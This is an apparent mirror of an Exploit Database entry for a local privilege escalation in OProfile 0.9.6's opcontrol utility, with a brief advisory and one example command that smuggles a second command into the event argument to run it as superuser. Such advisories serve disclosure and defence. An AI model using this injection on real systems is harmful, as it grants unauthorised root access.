OProfile 0.9.6 – ‘opcontrol’ Utility ‘set_event()’ Local Privilege Escalation

• Exploit Database
• 138 阅读

• 作者： Stephane Chauveau
  日期： 2011-04-29
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/35681/
• 1 2 3 4 5 6 7 8 9 10

  source: https://www.securityfocus.com/bid/47652/info   OProfile is prone to a local privilege-escalation vulnerability.   An attacker can exploit this issue to run arbitrary commands with superuser privileges.   The following example command is available:   sudo opcontrol -e "abcd;/usr/bin/id"